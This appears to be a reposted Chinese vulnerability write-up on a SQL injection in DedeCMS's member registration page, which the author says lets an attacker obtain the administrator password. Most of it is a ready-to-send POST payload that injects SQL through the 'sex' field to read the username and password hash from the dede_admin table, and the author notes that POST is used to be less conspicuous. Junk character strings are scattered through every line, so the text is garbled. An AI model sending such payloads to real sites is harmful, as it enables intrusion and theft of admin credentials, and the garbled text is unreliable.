漏洞类型: SQL注射漏洞
" `$ g' p! I: j6 ~简要描述:
' r4 H: Z2 h6 ]7 h4 a3 y4 f 9 k3 N. t: X) i2 ]/ ?+ f
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
) x y2 o! O' z( \原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
) H2 a; N1 |& L( E0 }# S. f: C$ o详细说明:跟这个漏洞' y$ T* M- w7 A3 ^8 B7 }
. t1 T- y8 x/ K- r% GWooYun: Dedecms SQL注射导致审核机制绕过漏洞
$ n" ]( Z# L6 D1 X& o5 ]: h. v是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.$ b+ Y9 {+ L T0 K; }) j, Q2 j/ i0 b
POST提交以下数据,其实不用POST提交的,这样隐蔽点.! T9 b ~: {5 b9 x
4 a0 F2 N+ F7 Y1 \! |www.political-security.com/member/reg_new.php
) x1 O3 T0 f8 _: n/ ]2 }
, Q/ k+ Q7 ^0 W C! @3 I7 _POST7 Q- M9 r* |& m" L* d6 G+ U
4 [1 Z" R e5 u8 Rdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
6 f$ I) C$ }) f# S8 S! y( f4 wuserid=c4rp3nt3r&uname=c4rp3nt3r
# Z) A% v7 g3 J, ?8 x0 O S% j&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
7 M( i0 ^! B# y. x&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
2 s2 }& @8 S0 s& j, R1 A- f(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');: t1 w6 [* p8 c; ?! l& Q
%00&vdcode=glos&agree= |